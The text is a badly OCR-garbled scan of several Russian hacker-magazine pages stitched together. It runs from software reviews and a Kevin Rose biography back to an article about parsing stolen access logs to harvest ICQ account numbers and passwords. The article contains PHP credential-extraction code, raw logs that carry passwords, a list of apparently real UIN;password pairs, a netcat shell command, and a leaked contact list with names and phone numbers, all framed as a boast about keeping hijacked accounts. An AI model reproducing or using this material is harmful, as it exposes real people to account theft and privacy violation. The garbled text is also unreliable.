кой-либо ответствен- 
ности за возможный 
ущерб, причиненный 
материалами данной 
статьи. 
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ТехЮіѵібег 1.1 




14441 




> іггіо 

Спасибо Кеше за 
парсинг номерков! 




> Ііпкз 

• ЦаСсопп — виновник 
торжества. 



Н ЛОГИ 

Вернувшись домой, я увидел в корне диска С:/ своего 
дедика свежевыкачанный гиговый архивчик. Но.таккак 
стандартными средствами Винды парсить такого размера 
файлы не представлялось возможным (например, рас- 
пакованный боба1_б ^ аб . сош-ассезз_1од . о1с!_ 
бі1109072007_1840 весил 1.5 Гб], то стоило задуматься о 
способе разбиения логов на несколько файлов поменьше. 
Немного погуглив, я нашел прекрасную халявную програм- 
мкуТехШіѵісіег 1.1 [ Ітее5о1 : Сги/ГІе.ЬітІ?ісі=672066&игІ=гер 
/672066/ТРіѵісІегІ уір ]. которая могла разбить огромнейшие 
текстовые файлы на новые мелкие файлы, причем, размер 
строк в полученныхтекстовикахты указываешь сам. 

Итак, в поле ТехЮіѵібег’а «ТехНіІе» я указал путь к моему 
первомулогу, а в поле «Оиіриио» — место для сохранения 
выходных файлов. Количество строк — 50000. Подождав 5 
минут, я увидел в оиіриі-папке около 250 готовыхтекстовичков 
слогами. В каждом текстовике содержались строки вроде: 




игами 



РгобіІе/МІБР-2 . О Сопбідигабіоп/СЕБС-1 . О " 
195.189.142.244 - - [ 09 /Мау/2 007 : 02 : 18 : 09 
+ 0300] " РОЗТ /іп(іех.р1ір?1а=ги&ісд_ 
иіп=2 941162 0 6&ісд ржі=боег080319 84гр0 6 
НТТР/1.1" 2 00 1010 " "Орега/8 . 01 (Н2МЕ/МІБР; 
Орега Міпі/3 . 1 . 7196/1662 ; ги; 13; ззг) " 

Парсить их вручную, какты понимаешь, не представлялось 
возможным. Плюс гп5п, уабоо и прочие аккаунты были мне 
не нужны, я гнался именно за ІСО-уинами. Пришла пора 
поднимать мои старые архивы с собственноручно написан- 
ными РНР-парсерами раГсот :). 

Ж ПАРСИНГ 

Не буду утруждать тебя своим кодом, приведу лишь самые 
важные части парсера: 

<?рЬ.р 

//функция открывает файл логов и выдирает из 
него значения ісд_иіп и ісд_рѵ\кЗ 
бипсбіоп бігзб_б ^аб ( $бі1епате) 

{ 

ргед_табсЪ._а11 ( ' /ісд_иіп= ( [0-9] {5,9}) &ісд_ 
рѵгс!= ( . * ) ( & | НТТР ) /і ' , $бі1езб , $табскез2 ) ; 

гебигп $геб_ѵа1; 

} 

//функция убирает все лишние символы из най- 
денной выше строки с уином и паролем 
бипсбіоп Ьазіс_гер1асе ( $з) 

{ 

$з=ргед_гер1асе ( " /ісд_иіп= ( [ 0- 
9] {5,9}) &ісд_рѵ\гс[= ( . * ) ( I НТТР) /і " , " $1 ; $2 " , $з ) ; 

$з=збг_гер1асе ( ' боег ' , ' ' ,$з); 
$з=збг_гер1асе ( 1 грОб 1 , 1 ' ,$з); 



• ѵѵѵѵѵѵ.хакер.ги/ 
тадагіпе/ха/1 01/086/1 
азр — моя первая 
статья про ОіаГсот . 

• ѵѵ.ѵѵеЬ-Ьаск.ги/ 
сіоѵѵпіоасі/сіоѵѵпіоаб. 
рбр?до=1 0 — ЫеіСаІ 
под Винду и никсы. 



"кббр : / / бс!ѵзиуебѵ83ѵгбошгбѵозаег7баѵ\го8ебоа 
ѵг87бгоа8б222 . б^аб . сош/шзп/сиі ; д зеззіопісІ=9 
БВ1323 8В5066БЕС2 848ЕССР4Р8А13Е2 ?у=31Нда8 " 

" ЗопуЕгісззопК800і/К.ЫС Вгоѵтзег/МебРгопб/3 . 3 
РгобіІе/МІБР-2 . 0 СопИдигаРіоп/СЬБС-1 . 1 " 
217.65.192.44 - - [ 09 /Мау/2 007 : 02 : 17 : 45 
+ 03 00] "РОЗТ /іпбех . ркр?1а=еп&тзп_ 
ассоипб=уеЗр%4 Отзп . сот&тзп_ 
рѵ\к}=боеграгаподагр0 6 НТТР/1.1" 2 00 78 6 
"-" "Мокіа3100/1 . 0 (06.11) РгобіІе/МІБР-1 . 0 
СопИдигабіоп/СЬБС-1 . 0 " 

81.95.160.37 - - [ 09 /Мау/2 007 : 02 : 18 : 01 +0300] 
"-" 302 5 "-" "ЫокіаШ 3-1/2 .0628.0.0.1 360/3.0 
РгобіІе/МІБР-2 . 0 Сопбідигабіоп/СЕБС-І . 1 " 
200.43.139.14 - - [09 /Мау/2 007: 02: 18: 08 +0300] 
"-" 302 0 "-" "МОТ-Ѵ551/08 . 18 . 40К МІВ/2.2.1 



} 

//получаем префикс файлов с логами 
$иг1а=$_СЕТ [ бііе] ; 

//парсим первые 100 файлов 
бог ($к=1; $ к< 1 0 0 ; $к++) 

{ 

$кака= 1 ' ; 

$кака =$иг1а . ' - ' . $к . 1 . бхб ' ; 

$кака=бігзб_бд аб ($кака) ; 

$кака=Ъазіс_гер1асе ( $кака) ; 

//выводим на экран отсортированный список 
иіп; раззѵтогсі 

! етрбу ( $кака [ $і ] ) ? ргіпб игібесосіе ( $кака [ $і ] 
) . ' <Ъг/> ' : " ; 

} ?> 
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рП С:\Ѵ/ІМ00Ш5\5у5І:ет32\стй.ене - С:\пеІсаІ:\пс.еке -I -р 11457 



иій=0<гооО дій=0<гооО 
иіс1=0<гоо<; > дій=0<гооО 
ей /и5г/1оса1/арасЬе_1 . 
1з -Іа 

*о1;а1 2144452 
Лгнхр-хг-х 2 гооі гоо 1 
йгмхг-хг-х 14 гооі гооі 
1 1*00 1 1*00 1 



дгоир5=99СпоЪойу},.536<падспй> 
дгоіірз=99 <поЪойу> „536<падспй> 
3 -37/Іодз 



ГЫ“Г — г 

|— ГЫ 

|— ГЫ 

гы 

|— ГЫ 

|-гы 

ГЫ 

гы 

І-гы 

|— ГЫ 

ГЫ 

ГЫ 

|— гы 

-гы 

—гы 

|-гы 

гы 

—гы 



1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 

1 



гооі гооі 
гооі гооі 
ГООІ ГООІ 
ГООІ ГООІ 
1*00 1 1*00 1 
ГООІ ГООІ 
ГООІ 1*001 
ГООІ ГООІ 
ГООІ ГООІ 
1*00 1 1*00 1 
ГООІ ГООІ 
ГООІ 1*001 
ГООІ ГООІ 
1*00 1 1*00 1 
ГООІ ГООІ 
ГООІ ГООІ 
ГООІ ГООІ 



16384 

4096 

6677 

42616565 

29124350 

34463258 

2352 

14171569 

43803021 

0 

453 

116 

232 

691 

0 

231 

80 

78 

470 

642137 



Осі 

йип 

Вес 

Ыом 

Осі 

Осі 

«Гни 

Осі 

Осі 

Осі 

Осі 

Аид 

Аид 

Аид 

Маг 

Маг 

Йап 

Ыои 

Мои 

Маг 



29 04:06 
24 14:48 



5 

1 



2007 
16=41 
26 04:05 
19 04:06 
6 2007 

12 04:06 
5 04:04 
29 04:06 
28 19:10 
28 21:35 
21 21:02 
17 02:00 
23 2008 



22 

20 

24 

1 

8 



2008 

2008 

2007 

2007 

2007 



83.225. 22 4-95.1x1 
ассезз_1од 
ассезз_1од -1 
ассезз_1од -2 

ассе5с_1од_217.1І8 -81-42 
ассезз_1од .3 
ассезз_1од -4 
ао Ігерогіз -1 заі .соп_ассе55 
ао Ігерогіз -1 лаі .соп_ассезз 
ао Ігерогіз -1 эаі .еот_ассезз 
ао Ігерогіз .І^аі -соп_ассезз 
ао Ігерогіз -1 даі .соп_ассезз 
ао Ігерогіз -1 даі -соп_еггог_ 
ао Ігерогіз -1 даі -соп_еггог_ 
ао Ігерогіз -1 ^аі .соп_еггог_ 
ао Ігерогіз -1 ^аі -соп_еггог_ 
ао Ігерогіз -1 даі . сот_еггог_ 
сЬеск 



_1од 

_1од-1 

_1од.2 
_1од - 3 
_1од.4 
Іод 
Іод-1 
Іод. 2 
Іод - 3 
Іод -4 



истинглогов баксот 



Запустив свой парсер, я стал методично просматривать выводимые на 
экран списки номерков. Красивые откладывал сразуже для последу- 
ющей проверки. Процедура заняла у меня 4 дня :). Просмотрев каждый 
лог, я получил следующий улов: админские пятизнаки 14441 , 35555, 
55444, 1 9975; простые неадминские пятизнаки в количестве 3 штук (не 
пишу ихтут, потому что просто не хочу палить :]; шестизнакиХУ в коли- 
честве 5 штук (не пишу их потой же причине], других красивыхХѴ, АВ и 
зеркала — очень много :). 

Далее я отдал списки логов на чексвоемутоварищу, который спустя 
несколько дней выдал мне отчет, содержавший около 50 тысяч валидных 
уинов. 

ММЯШШЯИППі 

« »ВИ/І Ьйр : //МЦЯрЧН/ІіаІ 1 . рЬрТГіІе^ГіІе 

070380^070380 

91287:аѵіуасо1 

9Ш7;9Ш7 

1 10379:Ъопюго 

Ш45б;Ш45б 

152022;СЪР°Р№ 

169098;за6540 

197809;8856 

229133;20036425 Л. Г 200 892 
252525^ошЬа 
437666^іа4аіпапо 
5б3409;СшЬзУ2№ 

7і3447^1еѵааі 

719265;105То4грЛ 1" 302 13"- 
3304б7;4жіо 

330467 ;4шіо /11" 302 13"- 
840446Д737840И 
915213;"ЭД ЛАВ 
973046;37з85 8 
1Ю4229;ТгІОНе 
1307529;89008900 
1307529;89008900 ЛЛ" 302 13 
1 374889;Аѵі3634 3/1.1" 302 13"- 
1795348;е^олт17 



Н НАПОСЛЕДОК 

Таккакмы нежадные, тозабрали себе и попривязывали ко всяким 
локализованным партнерам лишь самые красивые уины :]. Остальные 
находятся в целости и сохранности. Из интересного могу предложить 
тебе кусок контакт-листа одного из самых главных админов 35555: 

ІС<2; 1000 8 ; Огеу Сіі-уаш; ; + 972 (52) 4872322 ЗМЗ;Ргі Зер 23 
2005 11:08:38 

ІС<2 ; 1 0 О 0 9 ; Тотег ; ; ; Зип Зер 25 2005 13:00:09 

ІС<2; 11221 ; Ьіак -Мгкк ; ; ; Тки Маг 30 2006 13 :28 :59 

ІСО; 17168 ; ік 2 Ік кгіеі; ; ;ТЬи РГоѵ 14 2002 13:45: 11 

ІСО; 199516410; Саііа; ; ;ТЬи СГиІ 06 2006 12:39:55 

ІСО; 200002 ;Егап Оііг; ; +972 (52) 8200002 ; Тки Мау 19 2005 

10:39:14 

ІС<2; 22221 ; Озпак Раіпаги — РгоЬи; ; ; Тие Зер 20 2005 
07:21:41 

ІС<2; 22344 ; Асіі Уозоѵ; ; ;Шес1 Ьип 07 2006 10:27:45 
ІСО ; 2 3 0 0 4 ; СЬаппу ; ; ; 

ІСО; 2775815 ;Ог; ; ; 

ІСО; 30000 ; ікау ; ; ; Зак Мау 21 2005 05:17:55 

ІС<2; 3 0003 ;Ка1іа - Зиррогк ; ; ; Зак Мау 21 2 005 05:17: 55 

ІС<2 ; 3 1372 ; Огікі 0А; ; ; Зак Мау 21 2005 05:17:54 

ІС<2; 3148 0 ; Какекек ; ; ; Ргі РеЬ 10 2006 08:56:03 

ІС<2; 4444 6 ; ЗЬагоп Медап; рикі@ісе . сот; ; Тие Оск 31 2006 

06:41:26 

ІС<2; 51513 ;Огап; ; ; Тие Бес 12 2006 10:05:44 

ІС<2; 5164573 ;Огеу; ; ; Ргі РеЬ 10 2006 08:54: 58 

ІС<2; 5555 6 ; Надік ; ; +972 (54) 6333223 ; Ргі РеЬ 10 2006 

08:54:58 

ІС<2 ; 5 9 0 0 0 ; Еу к ап — <2А ; ; + 9 7 2 (51) 840315;Ргі РеЬ 10 2006 
08:54:58 

ІС<2 ; 59595 ; Еуаі Мепкгег; ; ; Ргі РеЬ 10 2006 08:54:58 

В заключение хочу сказать тебе, что ничто в Сети не может считаться 
безопасным. Даже уже однажды взломанный и в дальнейшем пропат- 
ченный сервис, которым ежедневно пользуются тысячи людей, включая 
самихадминов Ісц.Сот. 

Р.З. По поводу использования доступа к аськам админов у нас есть неко- 
торые интересные идеи, но это уже, как говорится, в следующей серии. ИИ 
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ПРОГРАММА: 5ІМРІ.ЕІКСВ0Т 
ОС:*МІХ/УІІЧ 
АВТОР: 0ІМІ4 




Конфигурируем бота 



Те, кто наивно полагают, что время ІРС-чатов 
(или просто Ирки :]] уже давно прошло, глубоко 
о ш и ба ются . До ка зател ьство м м о гут служить 
регулярно появляющиеся софтины.такили 
иначе связанные с ІРС. Вот, кстати, очередной 
довольно интересный I РС-бот, накоденный на 
РНР — ЗітрІеІгсВоі В комплектутилы входит 
несколько скриптов: 



• соп^ід.рЬр — конфиг бота, инфа о 
канале , и т . д . 

• соппесб.рЪр — коннект к серверу 

• іпсіех.ріір — сам бот : ) 



Атакже парочка полезных модулей: 



• Ъасіѵгогсіз . рЪр — цензура слов/выра- 
жений 

• сопбгоІ.рЪр — контролер бота 

• орегабог .рЬр — управление каналом 

• обЬег .рЬр — ебс :) 



Для успешной и правильной работы бота 
необходимо очень грамотнозаполнить конфиг, 
например: 




<?рПр 

I * * 

* ©асШПог Біші4 

* @соругідйб 2008 

* Осопбід.ріір 
*/ 

зеб_біте_1ітіб ( 0 ) ; 

//$ех[3] = теззаде 
//$ех[2] = сйаппеі 

/* зегѵег */ 

$зегѵег = " ігс . ЫаЫаЫа . сот" ; 

$рогб = 7771; 

$скап = " #Ыа" ; 

/* аибіі */ 

$ібепб = "хак" ; 

$пате = "попе" ; 

$піскте = "Ьід_хакер " ; 

$разз = "раззѵлэгсі" ; 

/* — оѵтег */ 

$ оѵтег = "КООТ" ; 

$боріс = "ЫаЫа" ; //скаппеі 
боріс (ѵтЬе п КЕЕР_ТОРІС епаЫеб) 

/* абшіп */ 

$орб [ ' абшіп_1одіп ' ] = " абшіп" ; 

$орб [ ' абтіп_разз ' ] = "раззілгогсі" ; 

/* — Тгіепбз */ 

$Тгіепбз = аггау ( "хакег" , "поЬобу " , 
"Ьід_позз" , "ѵ^ібі" , " зкеіі" ,$ошіег) ; 
?> 



КОРОТКО ПОЯСНЮ: 



$боріс — здесь указываем топик ка- 
нала ; 

$орб [ ' айтіп_1одіп ' ] / $орб [ ' асішіп_ 
разз 1 ] — аккаунт для запуска бота; 
$бгіепсіз — список юзеров с дополни- 
тельными привелегиями . 



Теперь немного о правах юзеров. Начнем с 
гостей: 



!мат — кик при мате 
! -мат — не кикать при мате 
!диіб — выход с канала 
Шеір — хелп 
ІаЬоиб — инфа о боте 



Френды могут все то же самое, что и гости + 
возможность модерирования комнаты и еще 
несколько приятных мелочей. Ну а про овнера я и 
говорить не буду, думаю, тебе и так все понятно. 

В общем, если ты ищешь подходящего бота — 
попробуй заюзать5ітрІеІгсВоТ Тем более, для 
его работы подойдет практически любой сервер, 
лишь бы работали сокеты и зеМіппеДітіШ. 

ПРОГРАММА: АКѴІ9 МАСІЧІНЕК 
ОС: УІІЧ&ОУ 5 2000/ХР 

Как часто ты сталкиваешься с проблемой 
сжатия фоток и прочих изображений? Аесли 
говорить об обратном? Да -да, ты не ослышался 
— увеличить фотку в дома ш них условиях, да 
еще и без ощутимых потерь в качестве вполне 
возможно. И поможет нам в этом утила «АКѴІ5 
Мадпібег», предназначенная для изменения 
размера цифрового изображения без потери 
качества. При изменении размера картинок 
в большинстве прог используются самые 
простые алгоритмы интерполяции. Их вполне 
достаточно для уменьшения фотографии, так 
как в полученном изображении содержится 
гораздо меньше информации. Но если ты 
захочешьувеличитьфото в несколько раз, то 
обязательно столкнешься с рядом трудностей 
(увы, тут и РЬоІозЬор вряд ли поможет]. 

С помощью «АКѴІ5 Мадтбег»ты получишь 
вполне приличное изображение даже из 
маленькой картинки! Изменяя размер фотки, 
тулза с легкостью восстанавливаетее границы 
и детали, так что в конечном итоге ты получа- 
ешьточную копию оригинала нужного формата. 
Из основных возможностей софтины выделим: 



• Продвинутые возможности управле- 
ния над переходными зонами и четкос- 
тью краев для получения наилучшего 
результата . 

• Возможность добавления «зернис- 
тости», — что улучшает восприятие 
изображения, придает ему объем и 
реалистичность . 

• Сохранение избранных настроек для 
дальнейшего их использования и оптими- 
зации процесса обработки изображений . 
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• Расширенные возможности масштаби- 
рования для детального просмотра и 
более точного подбора параметров . 

• Возможность быстрого переключе- 
ния между исходным изображением и 
результатом . 

• Работа с изображениями КСВ, 
Сгаузсаіе, СМУК и ЬаЬ; 8/16/32 Ъібз. 

• Две редакции: плагин для АбоЪе 
Рбобозбор и обычная программа 
(збапбаіопе) . 

• Поддержка форматов ЦРЕС, РЖ , ВМР, 
ТІРР (в версии збапбаіопе) . 

• Поддержка Ехіі и ІРТС гарантирует 
сохранность метаданных изображений 
(в версии зкапбаіопе) . 

• Возможность печати изображений на 
принтере (в версии збапбаіопе) . 

• Поддержка пакетной обработки фай- 
лов (в версии «плагин») . 



Максимально возможный размер получаемого 
с помощьютулзы изображения — до ЗОк пиксе- 
лов по ширине/высоте, но поверь, этого вполне 
достаточно для бытовых нужд. 

ПРОГРАММА: ЮЕАІ_ АСМІІЧІЗТКАТЮІЧ 
ОС: У№0У5 200О/ХР/2003 
АВТОР: РОІІЧТ0ЕѴ 

Такилииначе.многимизнас приходится под- 
рабатывать, втом числе и сисадминами. Что 
может быть прекраснее поднятого сервака или 




Полноценное администрирование 



восстановленной сетки? Регулярно сталкива- 
ясь с проблемами управления пользователями 
и мониторинга серверов, остро испытываешь 
потребность в удобном продукте, который бы 
объединял в себе функциональные возмож- 
ности, необходимые для управления поль- 
зователями, серверами и доменами. Таким 
продуктом является «ЮЕАІ_ Асіппіпізітабоп». Он 
осуществляет: 



1. Централизованное администрирова- 
ние Мпскжз ЖУ2 00 0/2 003 доменов. 

2 . Быстрое дистанционное управление . 

3 . Управление аккаунтами юзеров . 

4 . Мониторинг серверов . 



С ним у тебя больше не возникнет проблем с 
управлением группами юзеров, созданием 
аккаунтов, работой с реестром и внешними 
девайсами, атакже с мониторингом процессов 
натвоем любимом сервере. 

Сразу вынужден тебя огорчить — утила плат- 
ная, и стоитона несколько сотен вечнозеленых 
американских президентов. Но ведьза хоро- 
ший софт и заплатить не жалко, правда? :). 




ПРОГРАММА: ТЕМРЫЕР 
ОС: У ІІЧ0ОУ 5 2000/ХР 
АВТОР: ІЧІ!КРІ_МАІЧ 




Про регулярную очистку винчестера, темповых 
папок, кэша, браузерной истории и прочих нема- 
ловажных вещей писалось не раз. Но все равно, 
подобрать надежный, а главное, функциональный 
софтнетак-то просто. Поэтому хочу представить 
тебе вполне приличную утилу подобного рода 
— «ТЕМРЫЕР». Программа создана специ- 
ально для уничтожения мусора из папок: Тетр, 
Тетрогагу Іпіегпеі Еіез, Соокіез, но в отличие 
от многих других продуктов делает она все при 
загрузке компа. Это препятствует регулярному 
захламлению указанных директорий (по дефолту 
при загрузке чистится только ТЕМ Р, а остальные 
—ты можешь настроить по своемужеланию). 
Также программа умеетубивать проблемы с 
прерыванием работы инсталлера ІпзЕаІІ ЗЫеІсІ 
(когда подготовка доходит до 99% и установщик 
вылетает]. Для этого тебе необходимо поста- 
вить галку «ПереместитьТЕМР в С:\Тетр». 
Кроме того, тулза может за ста вить Винду пе- 
реустановить любую версию ОігесіХ, включая 
откат до более старой. Софтина обладает рядом 
функциональных особенностей, среди которых: 



1. Наличие панели быстрого запуска. 
Достаточно просто скопировать нужные 
ярлыки в папку Тетр1іег\КІЖ. 

2 . Расширенный список мусорных фай- 
лов; поддерживаются такие расши- 



рения , 


как : * 


.Стр, *.~раз, *. 


~с , 


* .бак, 


* . оіб, 


*.1од, 


* .~Ь 


* 


*.??*, 


~ , * . гшр , * . 


_гшр 


* . зуб, 
* . СНК , 


* . зМ, 

* . сЗшр . 


*.о1б, *.Ъак, * 


. Ьас 



3 . Утила полностью вычищает Соокіез , 




4 . Поддерживается русский язык. 



Одним словом, если тебе есть что скрывать 

— смело сливай утилу с нашего ДВД и вперед 

— чистить винт :]. 



ПРОГРАММА: А5Т0ІЧ 
ОС: *1Ч1Х/У11Ч 
АВТОР: 0ІМІ4 

Наступила зима, на носу НГ, аутебя на десктопе 
до сих пор никаких изменений? Ничего страшно- 
го, сейчас мы это исправим, а поможет нам тулза 
под названием «Азіюп». Утила представляет из 
себя обновленный десктоп с наличиемтаких 
функциональных компонентов, кактулбары (ака 




боковые панельки], дополнительные кнопки 
задач и много чего еще. Но обо всем по порядку: 



1 . Наличие всевозможных тулбаров 
(ака боковых панелей) , обеспечиваю- 
щих легкий доступ к самым необходи- 
мым каталогам/приложениям. 

2 . Наличие дополнительных кнопок 
на панели задач, которые ты можешь 
настроить по своему усмотрению 
(регулированию поддается буквально 
все: от внешнего вида до размеров) . 
3. Обновление панели быстрого запус- 
ка (теперь ее размер может быть сжат 
вплоть до одного баттона : ) ) . 

4 . Иконки на рабочем столе могут быть 
любого размера и формы (возможна 
даже анимированность) . 

5 . Встроенный хоткей-диспетчер ака 
диспетчер горячих клавиш . 



Впрочем, это далеко не полный список возмож- 
ностей софтины. Каксказано на сайте разработ- 
чиковтулзы, есть пять основных причин, по кото- 
рым тебе следует обратить внимание на прогу: 

1. Скорость. Большинствоутил, предназначенных 
для улучшения свойств Рабочего Стола, снижают 
скорость работы твоей ОС, при этом им требуются 
дополнительные объемы памяти и ресурсы про- 
цессора. В отличие оттаких инструментов Азіюп 
целиком и полностью заменяеттвой десктоп, 
потребляя минимум ресурсов системы. 

2. Надежность. Пройдя тщательнейшую провер- 
ку на огромном количестве самых разнообраз- 
ных ПК, тулза зарекомендовала себя, какодна из 
самыхустойчивых программ подобного рода. 

3. Мощность. По словам разработчика, утила 
замечательно работает с любой версией 
Винды, начиная с ‘98 и вплоть до ХР. При этом 
софтина нетолько не потребляет дополни- 
тельных ресурсов системы, но и уменьшает 
нагрузку на ОЗУ и ЦП по сравнению со 
стандартным десктопом, что немаловажно на 
старых компах. 

4. Красивый внешний вид. Софтина представ- 
ляетогромные возможности по изменению 
внешнего вида десктопа, крометого, авторы 
проги представляют дополнительный набор 
тем, которыеты можешь скачать с официально- 
го сайта разработчиков. 

5. Простота настройки. Создать собственный 

и н ди в и дуальный десктоп на самом деле просто. 
Это главная идея, которая лежит в основеутилы. 
Набор дополнительных возможностей, функцио- 
нальных особенностей и плагинов позволиттебе 
воплотить все свои фантазии в реальность :]. т 
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»РНБПЧИЕ 
ШЕСТИ ЧИТНТЕПЕН 




|поставил сабвуфер на стол и он у 



|не^^аверное очень весело дребезжит^^ 



Таигиз Зегіоиз (зегіоигШізІги) 




[Закрапываются полозрения. что [ПітЯгЕтЙЯЯЯЯЬ^ 
[вечерам в одножало водку из пластикового стаканчика| 





ІМы лолго спорили: то ли НЦ"МЮяППЯИЯІЯД мамѵі 

[сфотографировать себя за компом.толи прислал фотку своего ребенка] 




организовал камчатский 



Павел Газзаев (гесігіскгатаіІ.катсМаІка.ги)І 
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ПРИШЛИ НА МА6А2ІМЕЙПЕАШХАКЕР.ПІІ ФОТКУ СВОЕГО ДЕЙСТВИТЕЛЬНО ХАКЕРСКОГО 
РАБОЧЕГО МЕСТА (В ХОРОШЕМ РАЗРЕШЕНИИ) И МЫ ОПУБЛИКУЕМ ЕЕ В СЛЕДУЮЩИХ 



НОМЕРАХ! 




Іукрали вычислительным центр 



|«Электроника» из НИИ проблем плотинного хозяйства! 



Митя, Паша и Егор (заіргетГдіпЬох.ги) 




по вечерам разглядывать 
оболочкудиска X. Степ на неетоже частенько медитирует^^^^^^И 



[анила Чикалов (га*5ѵѵоШдхакер.ги)| 




^■ адРуль, наклейки, второе место на олимпиаде. Ср азу видно, что| 

- геймер.Д 



Алекс Горбатенко (аІех256догс!опгадтаі1.сот) 





ІСветв конце тоннеля ущ 




— 

■Свой кактус Щ 

[тюбика и вот какой он у него вы рос ИНД 



енис Иванов (аті-МоггоггатаіІ.ги 
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кдіпэтпга 

Копайте, 
Кевин, 
копайте ! 

Ресурс йі^.сот и его создатель 




И 



дивить кого-лиоо оперативностью новостей в сюти сейчас сложно. 



гам всех желающих — 






ІііЫіШ«:ЮІ8НІ1 

ЩЭШШя. 



ие мировые новостные ленты, потоковое видео 



ое. ідо прогресс прогрессом, а создать ресурсы, где новости «генери 






и многое 



ІШЯ 



и продвигают сами пользователи, догадались лишь недавно. 




На свет Роберт Кевин Роуз (РоЬегІ Кеѵіп Розе] появился 21 февраля 1977 
года, в США. Такуж вышло, что семья Кевина часто переезжала — ро- 
дившись в Калифорнии, раннее детство он провел в Орегоне, а потом 
семейство вновь вернулось на юг и оселоуже в Лас-Вегасе. Юношество 
Роуза протекало в крупнейшем в мире средоточии игорного бизнеса. 
Из-за этого он до сих пор со смехом напоминает в различных интервью, 
что в Вегасе, помимо казино и стрип-баров, есть и обычная жизнь, мало 
отличная отжизни в других городах. В самом деле, вот ведь незадача 
— Кевин, каки все нормальные дети, ходил в школу, вместо того чтобы 
шататься по притонам Вегаса, и даже был бойскаутом. 

Но лучше оставим в покое бойскаутов и обратимся кболее интересной 
намтеме — высокимтехнологиям. С компьютерами Роуз познакомился в 
совсем еще нежном возрасте, по его собственному признанию емутогда 



было около 8 лет. Первой его машинкой был ныне безнадежно древний, 



а тогда более чем актуальный ІВМ 8088. И очевидно, знакомство прошло 
успешно («Кевин, это компьютер. Компьютер, это Кевин»), В относитель- 
но скором времени отец купил мальчику личный ПК — Раскагб Вей 80386 
5Х 16. И воттаким нехитрым путем еще одним нормальным человеком 
стало меньше. Уже в конце 80-х юный Кевин открыл для себя увлекатель- 
ный мир В В5’ок и сетевого общения. Он до сих пор с тоской вспоминает 
времена, когда расшаривал доступ ксвоему СО-РОМ’у, щедро делясьс 
общественностью всяческим бесплатным софтом. Несложно догадать- 
ся, что Роуз попал под тлетворное влияние ІТ с головой, впоследствии 
умудрившись связать со всем этим свою судьбу. 

В свете нового увлечения Кевин перевелся в другую школу, где смог 
плотнее изучать компьютеры и анимацию, а после получения средне- 
го образования поступил в Университет штата Невада, г. Лас-Вегас 
(ІІпіѵегзііу о^ Ыеѵаба, І_аз Ѵедаз], собираясь и далее развивать свои 
познания в области вычислительнойтехники. Но карты юного даро- 
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ван ия спутал так называемый сЫ-сот бум, пришедшийся как раз на 
конец 90-х. Тогда общественность, наконец, углядела в сетевых проектах 
огромный потенциал и бросилась покорять новые рынки и горизонты. 
Фирмы и фирмочки, делающие бизнес в интернете, появлялись в изо- 
билии, как грибы после дождя, а инвесторы активно и охотно вкладыва- 
лись в подобные предприятия. Понаблюдав за этим почти броуновским 
движением и, видимо, решив не тратить более ценное время на учебу, в 
1998 Кевин бросил университет и отправился на поискиудачи. 

Ему удалось найти неплохую работу. Он устроился техническим консуль- 
тантом в департаментэнергетики США.аточнее, на ядерный полигон 
в родной Неваде. Стабилизировав свое финансовое положение, Роуз с 
радостью окунулся в мир стартапов и успел поучаствовать не в одном и 
не в двух начинаниях. Среди тех проектов (или, скорее, прожектов] ниче- 
го стоящего не нашлось, — разные источники диаметрально расходятся 
даже относительно иххарактера, не говоря уже о названиях. Впрочем, 
справедливости ради стоит отметить, что ряд известных нам сегодня 
компаний зародились именно втот период — во время расцвета дотко- 
мов. То есть, определенные шансы на успех и мелись у всех, и Кевину 
просто не повезло. Пузырь доткомов лопнул совсем скоро — в 2000 году. 
Тогда индекс высокотехнологичных компаний ЫА5 ОАО упал, и биржа 
акций едва пережила это потрясение. Сотни сетевых фирм обанкроти- 
лись, прекратив свое существование и отвратив население от дерзаний 
в сфере интернета. Это был сильный удар, как по крупным ІТ-компаниям, 
так и по общественному отношению к интернет-бизнесу — многиепосей 
день смотрят на него весьма пренебрежительно. 



ПОПАСТЬ В ТЕЛЕВИЗОР 



Однако, крах доткомов не вызвал у Кевина особенного уныния (возмож- 
но, потому что плотно связаться ни с одним действительно серьезным 
начинанием он неуспел], и Роуз обратился кдругим областям гиковской 
культуры, оставив в покое чужие стартапы. Довольно неожиданно он 
сменил ядерный полигон нателевизионную студию, что сыграло боль- 



шую роль и в будущей раскрутке біаа.сот и в судьбе самого Роуза. Но- 
вым местом его дислокации стал кабельно-спутниковый канал ТесЬТѴ, 
который сам по себе весьма примечателен. Тематика ТесЬТѴ всегда была 
оченьузкой, ориентированной на нердов — новости и различные шоу о 
компьютерах, новыхтехнологиях, интернете. И нельзя сказать, что при 
этом канал не пользовался популярностью: вещая на 70 стран мира, он 
имел аудиторию порядка 43 млн. подписчиков и около 1 .9 млн. просите- 
лей на сайте ежемесячно. Согласись, весьма неплохо для узкопрофиль- 
ного канала для гиков. 

Кевин устроился на ТесЬТѴ техническим ассистентом (должность одна 
из самых низших втамошней иерархии, попросту говоря — мальчикна 
побегушках] в шоуТЬе Зсгееп Заѵегз, нодолго в низах засиживаться не 
стал. Уже совсем скоро, установив стамошним коллективом хорошие от- 
ношения, он начал, ни много ни мало, собственной персоной появляться 
в эфире, не оставляя при этом и своих прямых обязанностей вТЬе Зсгееп 
Заѵегз. Стартовой площадкой для Кевина-ведущего послужило еще 
одно популярное шоу ТесЬТѴ — ІІпзсгеѵѵесІ ѵѵТЬ МагЬп ЗагдепЕ где Роуз 
вел короткие вставки, называвшиеся ЭагкТір (что-то вроде рубрики 
«Вредных советов» для компьютерщиков], из-за чего и заработал опре- 
деленную известность как«ОагкТіррег». 

Тематика ІТ-шных видео-подкастов заинтересовала Роуза не на шутку. 
Забегая вперед, скажу, что он не охладел к ней до сих пор. Атогда на дво- 
ре сменилосьтысячелетие, было начало 2000-х, и Кевин начал нетолько 
вести чужие, но и организоватьсобственные передачи. Так, найдя на 
съемочной площадке ТЬе Зсгееп Заѵегз братьев по разуму, он принял 
участие в создании хакерского подкаста іЬеЬгокеп, сконцентрирован- 
ного вокруг взлома софта, проникновения в чужие компы и прочихтем, 
относящихся к ІТ-безопасности. Здесь Кевин уже выступал нетолько 
одним из ведущих, но был и идейным вдохновителем, сценаристом и 
учредителем. Хотя до коммерции, конечно, было еще далеко — выпуски 
шоу распространялись через Р2Р-сети вроде КаХаа или ВТТоггепі.так 
что денег создателям затея не приносила. Зато имелся неплохой повод 
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для гордости — по словам Роуза, за первый год существования эпизо- 
ды видео-подкаста скачивали более 2 млн. раз. 

Таким образом, делау начинающейтелезвезды шли более чем уве- 
